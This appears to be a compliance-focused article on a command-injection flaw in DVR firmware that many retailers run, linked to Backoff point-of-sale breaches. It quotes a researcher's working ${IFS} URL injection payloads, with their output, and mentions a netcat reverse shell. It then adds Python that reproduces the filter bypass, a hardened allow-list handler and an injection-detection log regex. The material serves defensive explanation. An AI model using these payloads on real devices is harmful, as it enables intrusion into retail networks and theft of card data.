PCI Compliance and DVR Malware


Payment card compliance is difficult and costly even without faulty vendor software adding security problems on top. Research by Rotem Kerner suggests that a flaw in the DVR firmware shipped with security cameras from at least 70 vendors may have contributed to several of the credit card breaches that have recently proved costly to retailers. Kerner started from a paper on the Backoff malware that RSA published in December 2014. Backoff was used to steal payment card data from point-of-sale systems at multiple retail locations; the U.S. Secret Service said it affected more than 1,000 U.S. businesses, including Neiman Marcus, Michaels, Target, and UPS Store.

Kerner reviewed the data RSA had collected from computers infected with Backoff and found that many of them were also running a small web server listening on ports 81, 82, and 8000. That server, which identifies itself as “Cross Web Server”, is part of the DVR (digital video recorder) software that many retailers use for video monitoring. Exposed to the internet, it was left running on the same network as the payment card systems. That is an obvious security risk, and one that PCI scoping is meant to catch: a device like this should never share a network segment with the cardholder data environment.

Kerner’s article gives a step-by-step analysis of the server code and of how to exploit it to gain access to the target system, together with a list of the vendor systems affected by the vulnerability. The following excerpt from the article describes how he turned the injection into a working payload:

In order to exploit it I had to overcome a few obstacles I’ve identified –

1. Can’t use spaces or newlines, and the server does not understand URL encoding.
2. Length in between the slashes is limited.

I was able to bypass the no-space restriction with something called ${IFS}. Basically, IFS stands for Internal Field Separator; it holds the value that the shell uses to determine how to do field splitting. By default it holds “\n”, which is exactly what I needed. So this is my new attack vector –

/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js

And it worked! The file has been written. Let’s do another test –

/language/Swedish${IFS}&&echo${IFS}$USER>test&&tar${IFS}/string.js

outputs –

root

Great success!! As with many embedded systems, this one is using BusyBox, so what I decided to do is invoke netcat in order to get a nice and comfy reverse shell.
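The excerpt above shows the core of the bug: a URL path segment is spliced into a shell command string, and a filter that only rejects whitespace is defeated because the shell expands ${IFS} (which by default contains space, tab and newline) into field separators after the filter has run. The Python below is an added example written for this page; it is not Kerner’s code and not the DVR firmware. The command template, the file paths and the access-log lines are constructed assumptions used to reproduce the pattern: a naive whitespace filter, the ${IFS} bypass executed through /bin/sh, the hardened handler that allow-lists the segment and passes an argv list instead of a shell string, and a small log check that flags request paths carrying ${IFS} or shell metacharacters, which is what a retailer watching ports 81, 82 and 8000 would want to alert on.

```python
import re
import subprocess

# Constructed request paths for the demo (not captured traffic).
SAMPLE_PATHS = [
    "/language/Swedish",                                                  # benign
    "/language/Swedish && id",                                            # stopped by a space filter
    "/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js",     # the page's payload
]


def naive_filter(segment):
    """Hypothetical reproduction of a filter that only rejects whitespace.
    Returns True when the segment would be accepted."""
    return not any(c in segment for c in " \t\r\n")


def vulnerable_command(segment):
    """Hypothetical template that splices the segment into a shell string.
    The firmware's real command line is not shown on the page; only the
    shape (something before the segment, '/string.js' after it) is assumed.
    Never executed here: the payload would write files on the host."""
    if not naive_filter(segment):
        raise ValueError("whitespace rejected")
    return "tar -xf /mnt/web/language/%s/string.js" % segment


def run_shell(command):
    """Run a command through /bin/sh, the way a shell-string template would."""
    result = subprocess.run(["sh", "-c", command], capture_output=True, text=True)
    return result.stdout.strip()


def ifs_bypass_demo():
    """'echo${IFS}hello' has no literal whitespace, so the naive filter accepts
    it, yet sh expands ${IFS} and splits it into two words: 'echo' 'hello'."""
    payload = "echo${IFS}hello"
    if not naive_filter(payload):
        raise AssertionError("filter should accept a payload with no whitespace")
    return run_shell(payload)


# Hardened side: allow-list the segment and never hand it to a shell.
LANG_RE = re.compile(r"^[A-Za-z]{1,32}$")


def is_valid_language(segment):
    """Only plain alphabetic names are language identifiers; ${IFS}, &&, / etc. fail."""
    return LANG_RE.match(segment) is not None


def hardened_command(segment):
    """Build an argv list; with no shell in the loop, IFS expansion never happens."""
    if not is_valid_language(segment):
        raise ValueError("invalid language name")
    return ["tar", "-xf", "/mnt/web/language/%s/string.js" % segment]


# Detection side: flag request paths that carry ${IFS} or command-chaining
# metacharacters. Log format is Common Log Format; lines are constructed.
INJECTION_RE = re.compile(r"\$\{IFS\}|&&|\|\||[;|`]|\$\(")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+)')

SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2016:10:01:02 +0000] "GET /language/Swedish HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Mar/2016:10:01:09 +0000] '
    '"GET /language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js HTTP/1.1" 200 0',
    '10.0.0.9 - - [12/Mar/2016:10:02:30 +0000] "GET /index.html HTTP/1.1" 200 2048',
]


def suspicious_paths(log_lines):
    """Return the request paths from access-log lines that look like injection."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and INJECTION_RE.search(m.group(1)):
            hits.append(m.group(1))
    return hits


if __name__ == "__main__":
    for path in SAMPLE_PATHS:
        segment = path[len("/language/"):]
        print("%-70s filter=%s allowlist=%s" % (path, naive_filter(segment), is_valid_language(segment)))
    print("shell output for echo${IFS}hello:", ifs_bypass_demo())
    print("vulnerable command string:", vulnerable_command(SAMPLE_PATHS[2][len("/language/"):]))
    print("hardened argv:", hardened_command("Swedish"))
    print("flagged log paths:", suspicious_paths(SAMPLE_LOG))
```

The point of the hardened version is not a better blacklist: once the segment is validated against a short allow-list and passed as its own argv element, there is no shell to expand ${IFS}, so the class of bypass disappears rather than one spelling of it. The log check is deliberately crude and will flag any ${IFS} or && in a path; on a DVR that serves static language files that is the right trade-off.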
